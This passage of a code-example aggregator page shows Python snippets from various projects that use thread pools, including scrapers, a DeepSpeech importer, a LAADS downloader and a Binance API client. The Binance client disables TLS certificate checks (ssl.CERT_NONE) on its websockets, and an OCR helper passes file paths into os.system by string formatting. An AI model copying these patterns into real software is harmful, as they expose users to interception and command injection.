        # cluster size, we check the minimum nodes within the node groups to
        # match the current setup.
        self._check_cluster_size()
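
The start() method above relies on Pool.map_async plus a polling loop so that the main thread stays free to react to SIGINT while the nodes come up. A stripped-down sketch of that pattern, with a plain flag standing in for the real signal handler and cluster storage:

from multiprocessing.dummy import Pool
import time

def start_node(node_id):
    time.sleep(0.2)  # simulate a slow node start
    return "node-%d started" % node_id

keep_running = True  # in the real code this is flipped by the SIGINT handler

pool = Pool(processes=4)
result = pool.map_async(start_node, range(10))

while not result.ready():
    result.wait(1)  # wake up at least once per second to check the flag
    if not keep_running:
        # mirror the abort path: stop submitting work, then bail out
        pool.close()
        pool.join()
        raise SystemExit(1)

print(result.get())
pool.close()
pool.join()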
コード例 #48
0
ファイル: hist_pipeline_gray.py プロジェクト: jungbt/NMB
    def start_pipeline(self):
        """
        Defines the steps and order of the pipeline. Only call from Pipeline.run()
        to avoid errors.
        """
        mark = '================================='
        print(mark, '\nSTEP 0: GENERATING OUTPUT DIRECTORIES\n', mark)
        self.gen_directory_struct()
        print(mark, 'STEP 1:PREPROCESSING', mark)
        self.orig_MRI = self.MRI
        self.preprocess_histology()
        self.preprocess_blockface()
        self.preprocess_MRI()
        print(mark, '\nSTEP 2:RESAMPLING (OPTIONAL)\n', mark)
        #Resample data
        if self.resolution_level != 'MRI':
            self.MRI_path += 'resampled_'
        if self.resolution_level == 'histology':
            skip_flag = False
            #Match the resolution of histology
            if self.overwrite == False and os.path.isfile(
                    self.MRI_path + os.path.split(self.orig_MRI)[1]):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(self.MRI_path + os.path.split(self.orig_MRI)[1]))
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
            else:
                self.resample(self.MRI,
                              self.MRI_path + os.path.split(self.orig_MRI)[1],
                              self.histology.pix_dim, self.histology.affine_3D,
                              3)
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
            if self.overwrite == False:
                for slice in self.BF_NIFTI.slices:
                    if not os.path.isfile(
                            self.orig_bf_loc +
                            "/NIFTI/resampled/{}".format(slice.name)):
                        break
                else:
                    print(
                        ' - All Resampled Blockface NIFTI Files Exist. Utilizing currently existing data.'
                    )
                    self.BF_NIFTI.rename(self.orig_bf_loc +
                                         "/NIFTI/resampled/")
                    self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D
                    skip_flag = True
            if skip_flag == False:
                for slice in self.BF_NIFTI.slices:
                    self.resample(
                        slice.path, self.orig_bf_loc +
                        "/NIFTI/resampled/{}".format(slice.name),
                        self.histology.pix_dim, self.histology.affine_3D, 2)
                self.BF_NIFTI.rename(self.orig_bf_loc + "/NIFTI/resampled/")
                self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D
        elif self.resolution_level == 'blockface':
            #Match the resolution of the blockface
            if self.overwrite == False and os.path.isfile(
                    self.MRI_path + os.path.split(self.orig_MRI)[1]):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(self.MRI_path + os.path.split(self.orig_MRI)[1]))
            else:
                self.resample(self.MRI,
                              self.MRI_path + os.path.split(self.orig_MRI)[1],
                              self.bf.pix_dim, self.histology.affine_3D, 3)
                self.MRI = self.MRI_path + os.path.split(self.orig_MRI)[1]
        print(mark, '\nSTEP 3:ALIGNMENT\n', mark)
        self.slice_by_slice_alignment(self.threads,
                                      self.orig_slice_by_slice_loc)
        self.blockface_to_MRI_alignment(self.orig_bf_loc +
                                        "/volume/aligned_to_MRI")
        self.orig_hist_NIFTI.col = 'gray'
        pool = Pool(processes=self.threads)
        pool.map(
            Transform_Wrapper(self.orig_hist_NIFTI, self.hist_transform,
                              self.BF_NIFTI, self.orig_slice_by_slice_loc),
            list(range(len(self.hist_transform.slices))))
        pool.close()
        pool.join()
        hist_vol = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/gray',
                                      '*.nii.gz', self.hist_NIFTI.affine_3D)
        hist_vol.volumize(self.final_out + '/hist_to_bf.nii.gz')
        self.final_apply_transform(self.final_out + '/hist_to_bf.nii.gz',
                                   self.final_out + '/hist_to_MRI.nii.gz')
        if self.color == True:
            print(mark, '\nSTEP 4:COLORIZATION\n', mark)
            self.colorize(self.orig_col_split_loc, self.final_out)

        print('Done!')
コード例 #49
0
ファイル: crawler.py プロジェクト: 10elements/crawler
def parallelCrawling(url):
	threadPool = Pool(12)
	threadPool.map(download, nextURL(url))
	threadPool.close()
	threadPool.join()
コード例 #50
0
ファイル: products.py プロジェクト: shichaoji/recur7down
def product_main():
    
    try:
        sys.path.append(os.getcwd())
        from info import link, cat, large, small
        print 'imported data from info'
        sys.path.remove(os.getcwd())

    except:
        print 'lack of info.py'
        exit(0)
        
        
    #path = raw_input('the PATH of file contains a single string of the url link: ')
    #with open(path) as fh:
    #    link = fh.read()
    cpu = int(raw_input('(multi-processing) how many process to run ? '))


    #cat = [10020, 10021, 10010, 10001, 10003, 10006, 10019, 10008, 10009, 10011, 10013, \
    #      10023, 10022, 10015, 10012, 10007, 10017, 10018]

    #large = [19, 1, 17, 9, 10, 11, 23, 18, 15, 16, 12, 22, 13, 6]
    #small = [25, 27, 14, 3, 2, 556, 8, 20, 31, 7, 21, 4, 24, 28, 5, 32, 30, 33, 29, 561, 560, 34]

    
    try:
        from info import link, cat, large, small
        print 'imported data from info'
    except:
        print 'lack of info.py'
        exit(0)    



    swim = []

    for i in small:
        swim.append((link, i, 0))

    for p in large:
        for c in cat:
            swim.append((link, p, c))
    
    
    
    
    
    
    
    print "combinations: "+str(len(swim))
    start=time()

    pool = ThreadPool(cpu)
    
    results = pool.map(helper, swim)
    pool.close()
    pool.join()
    
    end = time()
    elapse = end - start 
    print 'used {:.2f} s, {:.2f} mins'.format(elapse, elapse/60)
    
    print 'start concating data'
    
    ct = ctime().split()
    path = ct[2]+ct[1]+ct[-1]+'_product/'
    
    files = os.listdir(path)
    len(files)
    df = pd.concat([pd.read_excel(path + i) for i in files])
    print df.shape
    print 'removing duplicates'
    
    col = list(df.columns)
    col = [col.pop(col.index('pid')), col.pop(col.index('title'))]+col
    df = df[col]
    df = df.reset_index(drop=True)
    
    df = df.loc[df['pid'].drop_duplicates().index,:]
    print df.shape
    print 'saving to products.xlsx'
    
    df.to_excel(strftime("%Y-%m-%d-%H-%M",localtime())+ ' Products.xlsx', encoding='utf-8', index=False)
    print 'done!', ctime()
コード例 #51
0
ファイル: import_cv2.py プロジェクト: zh4r0nax/DeepSpeech
def _maybe_convert_set(input_tsv,
                       audio_dir,
                       label_filter,
                       space_after_every_character=None):
    output_csv = path.join(audio_dir,
                           os.path.split(input_tsv)[-1].replace('tsv', 'csv'))
    print("Saving new DeepSpeech-formatted CSV file to: ", output_csv)

    # Get audiofile path and transcript for each sentence in tsv
    samples = []
    with open(input_tsv, encoding='utf-8') as input_tsv_file:
        reader = csv.DictReader(input_tsv_file, delimiter='\t')
        for row in reader:
            samples.append((row['path'], row['sentence']))

    # Keep track of how many samples are good vs. problematic
    counter = {
        'all': 0,
        'failed': 0,
        'invalid_label': 0,
        'too_short': 0,
        'too_long': 0,
        'total_time': 0
    }
    lock = RLock()
    num_samples = len(samples)
    rows = []

    def one_sample(sample):
        """ Take a audio file, and optionally convert it to 16kHz WAV """
        mp3_filename = path.join(audio_dir, sample[0])
        if not path.splitext(mp3_filename.lower())[1] == '.mp3':
            mp3_filename += ".mp3"
        # Storing wav files next to the mp3 ones - just with a different suffix
        wav_filename = path.splitext(mp3_filename)[0] + ".wav"
        _maybe_convert_wav(mp3_filename, wav_filename)
        file_size = -1
        frames = 0
        if path.exists(wav_filename):
            file_size = path.getsize(wav_filename)
            frames = int(
                subprocess.check_output(['soxi', '-s', wav_filename],
                                        stderr=subprocess.STDOUT))
        label = label_filter(sample[1])
        with lock:
            if file_size == -1:
                # Excluding samples that failed upon conversion
                counter['failed'] += 1
            elif label is None:
                # Excluding samples that failed on label validation
                counter['invalid_label'] += 1
            elif int(frames / SAMPLE_RATE * 1000 / 10 / 2) < len(str(label)):
                # Excluding samples that are too short to fit the transcript
                counter['too_short'] += 1
            elif frames / SAMPLE_RATE > MAX_SECS:
                # Excluding very long samples to keep a reasonable batch-size
                counter['too_long'] += 1
            else:
                # This one is good - keep it for the target CSV
                rows.append(
                    (os.path.split(wav_filename)[-1], file_size, label))
            counter['all'] += 1
            counter['total_time'] += frames

    print("Importing mp3 files...")
    pool = Pool(cpu_count())
    bar = progressbar.ProgressBar(max_value=num_samples, widgets=SIMPLE_BAR)
    for i, _ in enumerate(pool.imap_unordered(one_sample, samples), start=1):
        bar.update(i)
    bar.update(num_samples)
    pool.close()
    pool.join()

    with open(output_csv, 'w', encoding='utf-8') as output_csv_file:
        print('Writing CSV file for DeepSpeech.py as: ', output_csv)
        writer = csv.DictWriter(output_csv_file, fieldnames=FIELDNAMES)
        writer.writeheader()
        bar = progressbar.ProgressBar(max_value=len(rows), widgets=SIMPLE_BAR)
        for filename, file_size, transcript in bar(rows):
            if space_after_every_character:
                writer.writerow({
                    'wav_filename': filename,
                    'wav_filesize': file_size,
                    'transcript': ' '.join(transcript)
                })
            else:
                writer.writerow({
                    'wav_filename': filename,
                    'wav_filesize': file_size,
                    'transcript': transcript
                })

    print('Imported %d samples.' %
          (counter['all'] - counter['failed'] - counter['too_short'] -
           counter['too_long']))
    if counter['failed'] > 0:
        print('Skipped %d samples that failed upon conversion.' %
              counter['failed'])
    if counter['invalid_label'] > 0:
        print('Skipped %d samples that failed on transcript validation.' %
              counter['invalid_label'])
    if counter['too_short'] > 0:
        print(
            'Skipped %d samples that were too short to match the transcript.' %
            counter['too_short'])
    if counter['too_long'] > 0:
        print('Skipped %d samples that were longer than %d seconds.' %
              (counter['too_long'], MAX_SECS))
    print('Final amount of imported audio: %s.' %
          secs_to_hours(counter['total_time'] / SAMPLE_RATE))
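
The import above pairs pool.imap_unordered (so the progress bar can advance as soon as any file finishes) with an RLock-guarded counter dict shared by the workers. A stripped-down sketch of just that pattern, with a fake one_sample in place of the audio conversion:

from multiprocessing.dummy import Pool
from multiprocessing import cpu_count
from threading import RLock

counter = {'all': 0, 'failed': 0}
lock = RLock()

def one_sample(sample):
    ok = sample % 7 != 0  # pretend every 7th sample fails conversion
    with lock:
        counter['all'] += 1
        if not ok:
            counter['failed'] += 1

if __name__ == '__main__':
    samples = range(100)
    pool = Pool(cpu_count())
    for i, _ in enumerate(pool.imap_unordered(one_sample, samples), start=1):
        pass  # this is where bar.update(i) would go
    pool.close()
    pool.join()
    print(counter)  # {'all': 100, 'failed': 15}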
コード例 #52
0
ファイル: getdata.py プロジェクト: fswzb/QUANTAXIS-1
def _thread(hs, cs, n):
    pool = Pool(n)
    ret = pool.map(hs, cs)
    pool.close()
    pool.join()
    return ret
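
A hypothetical call to the helper above: fan three summation jobs out over a four-thread pool (the function is repeated only so the snippet runs on its own).

from multiprocessing.dummy import Pool

def _thread(hs, cs, n):
    pool = Pool(n)
    ret = pool.map(hs, cs)
    pool.close()
    pool.join()
    return ret

print(_thread(sum, [[1, 2, 3], [4, 5], [6]], 4))  # [6, 9, 6]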
コード例 #53
0
ファイル: searchLAADS.py プロジェクト: BENR0/searchLAADs
    def downloadFiles(self, directory = None, maxRetries = 5, multiproc = False, numproc = 3, overwrite = False):
        """Download URLs.

        TODO
        ----
        - overwrite parameter: to be able to skip or overwrite existing files
        - write urls of failed downloads to file?

        Parameters
        ----------
        directory: str
            Base directory where to save files
        maxRetries: int
            Maximum number of retries when opening the URL
        multiproc: boolean
            Download multiple files at the same time.
        numproc: int optional
            Number of processes if multiproc is set to True
        overwrite: boolean
            Should existing files be overwritten?

        
        Return
        ------
        """
        directory = self.targetDir

        def pathTuple(url, directory = directory):
            secfield = os.path.basename(url).split(".")[1]
            year = secfield[1:5]
            outdir = os.path.join(directory, year)
            return((url, outdir))

        def download(itemtuple):
            #unpack tuple
            url = itemtuple[0]
            directory = itemtuple[1]

            fname = os.path.basename(url)
            fpath = os.path.join(directory, fname)


            attempts = 0
            if not os.path.isfile(fpath):
                while attempts < maxRetries:
                    try:
                        response = urllib2.urlopen(url)
                        with open(fpath, "wb") as f:
                            f.write(response.read())

                        break
                    except urllib2.URLError as e:
                        logger.debug(e)
                        logger.debug("File {0} failed to download with the above error".format(url))
                        if attempts == maxRetries -1:
                            with open("download_failed.txt", "w") as f:
                                f.write(url + "\n")

                        attempts += 1
                        pass

            #update progressbar
            pbar.update(1)

            return


        try:
            if directory is not None:
                self.pathList = list(map(pathTuple, self.fileURLs))
            else:
                raise TypeError
        except TypeError:
            print("""No target directory were to store files given. Instantiate search obejct with 
                    directory or set the directory parameter of downloadFiles.""")
        
        #create year directories separate to avoid race condition when
        #using it in the download function itself and multiprocessing enabled
        for d in set([x[1] for x in self.pathList]):
            #check if fpath exists. create if necessary 
            if not os.path.exists(d):
                os.makedirs(d)

        msg = "Starting download of files..."
        logger.info(msg)
        #print(msg)

        pbar = tqdm(total = len(self.pathList))

        if multiproc:
            p = Pool(numproc)
            p.map(download, self.pathList)
            p.close()
            p.join()
        else:
            map(download, self.pathList)
        
        pbar.close()


        #check if file was downloaded correctly else download again

        pass
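
The nested download() above wraps each fetch in a retry loop and records URLs that never succeed. A compact sketch of the same idea written with Python 3's urllib.request (the original is Python 2 / urllib2; the URL, path and log-file names here are placeholders):

import os
import urllib.request
import urllib.error

def fetch(url, fpath, max_retries=5):
    """Download url to fpath, retrying up to max_retries times; skip existing files."""
    if os.path.isfile(fpath):
        return True
    for attempt in range(max_retries):
        try:
            with urllib.request.urlopen(url, timeout=30) as response, \
                 open(fpath, "wb") as f:
                f.write(response.read())
            return True
        except urllib.error.URLError:
            if attempt == max_retries - 1:
                # last attempt failed: remember the URL for a later retry run
                with open("download_failed.txt", "a") as log:
                    log.write(url + "\n")
    return False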
コード例 #54
0
def get_all(codes, f):
    print type(codes)
    pool = ThreadPool(40)
    pool.map(f, codes)
    pool.close()
    pool.join()
コード例 #55
0
ファイル: avtag.py プロジェクト: xinlawliet/bilibili-data
'''Iterate over every video's tags'''
#!/usr/bin/python
# -*- coding: utf-8 -*-

from multiprocessing.dummy import Pool as ThreadPool
from bilisupport import AVTAGLIST, ERRORLIST, API_TAG
import requests


def gettag(aid):
    '''Fetch the tags of one video (aid)'''
    if not aid:
        return 404
    aid = int(aid)
    aidparams = {'aid': aid, 'jsonp': 'jsonp'}
    info = requests.get(url=API_TAG, params=aidparams).json()
    if info.get('code') == 0:
        tags = [{'aid': aid, 'tag': x.get('tag_id')} for x in info.get('data')]
        AVTAGLIST.insert_many(tags)
        print(aid)
    else:
        ERRORLIST.insert_one(info)


if __name__ == '__main__':
    MULTIPOOL = ThreadPool(8)
    for avid in open('videoaid.csv', 'r'):
        MULTIPOOL.apply_async(gettag, (avid, ))
    MULTIPOOL.close()
    MULTIPOOL.join()
コード例 #56
0
class BinanceApi(object):
    """"""

    ###################################################
    ## Basic Function
    ###################################################

    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.apiKey = ''
        self.secretKey = ''

        self.active = False
        self.reqid = 0
        self.queue = Queue()
        self.pool = None

        self.headers = {}
        self.secret = ''
        self.recvWindow = 5000

        self.dataStreamNameList = []
        self.dataStreamUrl = ''
        self.dataStreamActive = False
        self.dataStreamWs = None
        self.dataStreamThread = None

        self.userStreamKey = ''
        self.userStreamUrl = ''
        self.userStreamActive = False
        self.userStreamWs = None
        self.userStreamThread = None

        self.keepaliveCount = 0
        self.keepaliveThread = None

    #----------------------------------------------------------------------
    def init(self, apiKey, secretKey, recvWindow=5000):
        """"""
        self.apiKey = apiKey
        self.secretKey = secretKey

        self.headers['X-MBX-APIKEY'] = apiKey
        self.secret = bytes(secretKey.encode('utf-8'))
        self.recvWindow = recvWindow

    #----------------------------------------------------------------------
    def start(self, n=10):
        """"""
        if self.active:
            return

        self.active = True

        self.pool = Pool(n)
        self.pool.map_async(self.run, range(n))

    #----------------------------------------------------------------------
    def close(self):
        """"""
        self.active = False

        if self.pool:
            self.pool.close()
            self.pool.join()

    #----------------------------------------------------------------------
    def request(self, method, path, params=None, signed=False, stream=False):
        """"""
        if not signed:
            url = REST_ENDPOINT + path
            headers = {}
        else:
            if not stream:
                params['recvWindow'] = self.recvWindow
                params['timestamp'] = int(time() * 1000)
                query = parse.urlencode(sorted(params.items()))

                signature = hmac.new(self.secret, query.encode('utf-8'),
                                     hashlib.sha256).hexdigest()
                query += "&signature={}".format(signature)

                url = REST_ENDPOINT + path + '?' + query
                params = None  # the params are now encoded in the query string, so clear the dict
            else:
                if params:
                    query = parse.urlencode(sorted(params.items()))
                    url = REST_ENDPOINT + path + '?' + query
                    params = None
                else:
                    url = REST_ENDPOINT + path

            headers = self.headers

        try:
            resp = requests.request(method,
                                    url,
                                    params=params,
                                    headers=headers)

            if resp.status_code == 200:
                return True, resp.json()
            else:
                error = {
                    'method': method,
                    'params': params,
                    'code': resp.status_code,
                    'msg': resp.json()['msg']
                }
                return False, error
        except Exception as e:
            error = {
                'method': method,
                'params': params,
                'code': e,
                'msg': traceback.format_exc()
            }
            return False, error

    #----------------------------------------------------------------------
    def addReq(self,
               method,
               path,
               params,
               callback,
               signed=False,
               stream=False):
        """添加请求"""
        self.reqid += 1
        req = (method, path, params, callback, signed, stream, self.reqid)
        self.queue.put(req)
        return self.reqid

    #----------------------------------------------------------------------
    def processReq(self, req):
        """"""
        method, path, params, callback, signed, stream, reqid = req
        result, data = self.request(method, path, params, signed, stream)

        if result:
            callback(data, reqid)
        else:
            self.onError(data, reqid)

    #----------------------------------------------------------------------
    def run(self, n):
        """"""
        while self.active:
            try:
                req = self.queue.get(timeout=1)
                self.processReq(req)
            except Empty:
                pass

    ###################################################
    ## REST Function
    ###################################################

    #----------------------------------------------------------------------
    def queryPing(self):
        """"""
        path = '/api/v1/ping'
        return self.addReq('GET', path, {}, self.onQueryPing)

    #----------------------------------------------------------------------
    def queryTime(self):
        """"""
        path = '/api/v1/time'
        return self.addReq('GET', path, {}, self.onQueryTime)

    #----------------------------------------------------------------------
    def queryExchangeInfo(self):
        """"""
        path = '/api/v1/exchangeInfo'
        return self.addReq('GET', path, {}, self.onQueryExchangeInfo)

    #----------------------------------------------------------------------
    def queryDepth(self, symbol, limit=0):
        """"""
        path = '/api/v1/depth'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryDepth)

    #----------------------------------------------------------------------
    def queryTrades(self, symbol, limit=0):
        """"""
        path = '/api/v1/trades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryTrades)

    #----------------------------------------------------------------------
    def queryAggTrades(self,
                       symbol,
                       fromId=0,
                       startTime=0,
                       endTime=0,
                       limit=0):
        """"""
        path = '/api/v1/aggTrades'

        params = {'symbol': symbol}
        if fromId:
            params['fromId'] = fromId
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime
        if limit:
            params['limit'] = limit

        return self.addReq('GET', path, params, self.onQueryAggTrades)

    #----------------------------------------------------------------------
    def queryKlines(self, symbol, interval, limit=0, startTime=0, endTime=0):
        """"""
        path = '/api/v1/klines'

        params = {'symbol': symbol, 'interval': interval}
        if limit:
            params['limit'] = limit
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime

        return self.addReq('GET', path, params, self.onQueryKlines)

    #----------------------------------------------------------------------
    def queryTicker24HR(self, symbol=''):
        """"""
        path = '/api/v1/ticker/24hr'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTicker24HR)

    #----------------------------------------------------------------------
    def queryTickerPrice(self, symbol=''):
        """"""
        path = '/api/v3/ticker/price'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTickerPrice)

    #----------------------------------------------------------------------
    def queryBookTicker(self, symbol=''):
        """"""
        path = '/api/v3/ticker/bookTicker'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryBookTicker)

    #----------------------------------------------------------------------
    def newOrder(self,
                 symbol,
                 side,
                 type_,
                 price,
                 quantity,
                 timeInForce,
                 newClientOrderId='',
                 stopPrice=0,
                 icebergQty=0,
                 newOrderRespType=''):
        """"""
        path = '/api/v3/order'

        params = {
            'symbol': symbol,
            'side': side,
            'type': type_,
            'price': price,
            'quantity': quantity,
            'timeInForce': timeInForce
        }
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        if timeInForce:
            params['timeInForce'] = timeInForce
        if stopPrice:
            params['stopPrice'] = stopPrice
        if icebergQty:
            params['icebergQty'] = icebergQty
        if newOrderRespType:
            params['newOrderRespType'] = newOrderRespType

        return self.addReq('POST', path, params, self.onNewOrder, signed=True)

    #----------------------------------------------------------------------
    def queryOrder(self, symbol, orderId=0, origClientOrderId=0):
        """"""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        return self.addReq('GET', path, params, self.onQueryOrder, signed=True)

    #----------------------------------------------------------------------
    def cancelOrder(self,
                    symbol,
                    orderId=0,
                    origClientOrderId='',
                    newClientOrderId=''):
        """"""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        return self.addReq('DELETE',
                           path,
                           params,
                           self.onCancelOrder,
                           signed=True)

    #----------------------------------------------------------------------
    def queryOpenOrders(self, symbol=''):
        """"""
        path = '/api/v3/openOrders'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryOpenOrders,
                           signed=True)

    #----------------------------------------------------------------------
    def queryAllOrders(self, symbol, orderId=0, limit=0):
        """"""
        path = '/api/v3/allOrders'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if limit:
            params['limit'] = limit
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryAllOrders,
                           signed=True)

    #----------------------------------------------------------------------
    def queryAccount(self):
        """"""
        path = '/api/v3/account'
        params = {}
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryAccount,
                           signed=True)

    #----------------------------------------------------------------------
    def queryMyTrades(self, symbol, limit=0, fromId=0):
        """"""
        path = '/api/v3/myTrades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        if fromId:
            params['fromId'] = fromId
        return self.addReq('GET',
                           path,
                           params,
                           self.onQueryMyTrades,
                           signed=True)

    #----------------------------------------------------------------------
    def startStream(self):
        """"""
        path = '/api/v1/userDataStream'
        return self.addReq('POST',
                           path, {},
                           self.onStartStream,
                           signed=True,
                           stream=True)

    #----------------------------------------------------------------------
    def keepaliveStream(self, listenKey):
        """"""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('PUT',
                           path,
                           params,
                           self.onKeepaliveStream,
                           signed=True,
                           stream=True)

    #----------------------------------------------------------------------
    def closeStream(self, listenKey):
        """"""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('DELETE',
                           path,
                           params,
                           self.onCloseStream,
                           signed=True,
                           stream=True)

    ###################################################
    ## REST Callback
    ###################################################

    #----------------------------------------------------------------------
    def onError(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryPing(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTime(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryExchangeInfo(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryDepth(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAggTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryKlines(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTicker24HR(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryTickerPrice(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryBookTicker(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onNewOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onCancelOrder(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryOpenOrders(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAllOrders(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryAccount(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onQueryMyTrades(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onStartStream(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onKeepaliveStream(self, data, reqid):
        """"""
        print((data, reqid))

    #----------------------------------------------------------------------
    def onCloseStream(self, data, reqid):
        """"""
        print((data, reqid))

    ###################################################
    ## Websocket Function
    ###################################################

    #----------------------------------------------------------------------
    def initDataStream(self, nameList=None):
        """"""
        if nameList:
            self.dataStreamNameList = nameList
        s = '/'.join(self.dataStreamNameList)
        self.dataStreamUrl = DATASTREAM_ENDPOINT + s

        result = self.connectDataStream()
        if result:
            self.dataStreamActive = True
            self.dataStreamThread = Thread(target=self.runDataStream)
            self.dataStreamThread.start()

    #----------------------------------------------------------------------
    def runDataStream(self):
        """"""
        while self.dataStreamActive:
            try:
                stream = self.dataStreamWs.recv()
                data = json.loads(stream)
                self.onMarketData(data)
            except:
                self.onDataStreamError('Data stream connection lost')
                result = self.connectDataStream()
                if not result:
                    self.onDataStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onDataStreamError(u'Data stream reconnected')

    #----------------------------------------------------------------------
    def closeDataStream(self):
        """"""
        self.dataStreamActive = False
        self.dataStreamThread.join()

    #----------------------------------------------------------------------
    def connectDataStream(self):
        """"""
        try:
            self.dataStreamWs = create_connection(
                self.dataStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except:
            msg = traceback.format_exc()
            self.onDataStreamError('Connecting data stream failed: %s' % msg)
            return False

    #----------------------------------------------------------------------
    def onDataStreamError(self, msg):
        """"""
        print(msg)

    #----------------------------------------------------------------------
    def onMarketData(self, data):
        """"""
        print(data)

    #----------------------------------------------------------------------
    def initUserStream(self, key):
        """"""
        self.userStreamKey = key
        self.userStreamUrl = USERSTREAM_ENDPOINT + key

        result = self.connectUserStream()
        if result:
            self.userStreamActive = True
            self.userStreamThread = Thread(target=self.runUserStream)
            self.userStreamThread.start()

            self.keepaliveThread = Thread(target=self.runKeepalive)
            self.keepaliveThread.start()

    #----------------------------------------------------------------------
    def runUserStream(self):
        """"""
        while self.userStreamActive:
            try:
                stream = self.userStreamWs.recv()
                data = json.loads(stream)
                self.onUserData(data)
            except:
                self.onUserStreamError('User stream connection lost')
                result = self.connectUserStream()
                if not result:
                    self.onUserStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onUserStreamError(u'User stream reconnected')

    #----------------------------------------------------------------------
    def closeUserStream(self):
        """"""
        self.userStreamActive = False
        self.userStreamThread.join()
        self.keepaliveThread.join()

    #----------------------------------------------------------------------
    def connectUserStream(self):
        """"""
        try:
            self.userStreamWs = create_connection(
                self.userStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE})
            return True
        except:
            msg = traceback.format_exc()
            self.onUserStreamError('Connecting user stream failed: %s' % msg)
            return False

    #----------------------------------------------------------------------
    def onUserStreamError(self, msg):
        """"""
        print(msg)

    #----------------------------------------------------------------------
    def onUserData(self, data):
        """"""
        print(data)

    #----------------------------------------------------------------------
    def runKeepalive(self):
        """"""
        while self.userStreamActive:
            self.keepaliveCount += 1

            if self.keepaliveCount >= 1800:
                self.keepaliveCount = 0
                self.keepaliveStream(self.userStreamKey)

            sleep(1)
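
BinanceApi.start() spins up n threads with Pool.map_async(self.run, range(n)), and each thread loops over a shared Queue until self.active is cleared. A minimal sketch of that worker-pool pattern with the request/callback plumbing left out (names here are illustrative):

from multiprocessing.dummy import Pool
from queue import Queue, Empty
import time

active = True
tasks = Queue()

def run(worker_id):
    # each of the n threads runs this loop, like BinanceApi.run()
    while active:
        try:
            req = tasks.get(timeout=1)
        except Empty:
            continue
        print("worker %d handled %s" % (worker_id, req))

if __name__ == '__main__':
    n = 4
    pool = Pool(n)
    pool.map_async(run, range(n))  # one long-running loop per thread
    for i in range(10):
        tasks.put("req-%d" % i)
    time.sleep(2)
    active = False  # lets the run() loops fall through and exit
    pool.close()
    pool.join()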
コード例 #57
0
ファイル: pdf_to_html.py プロジェクト: vasim07/hackathons
    def multithread_processor(self,
                              to_pdf=False,
                              to_text=False,
                              gen_images=False):
        def image_to_pdf(image_paths):
            for image_path in image_paths:
                print(image_path)
                if self.pdf_type == 'image':
                    filename = '%s/%s-%s_1' % (
                        self.images_folder, self.filename,
                        image_path.split('.')[-2].split('-')[-1])
                else:
                    filename = image_path.split('.png')[0]
                print(filename)
                os.system('tesseract --oem 1 -l eng --psm 6 %s %s pdf' %
                          (image_path, filename))
            return 0

        def image_to_text(image_paths):
            for image_path in image_paths:
                print(image_path)
                filename = '%s/%s' % (self.images_folder,
                                      image_path.split('.')[0])
                print(filename)
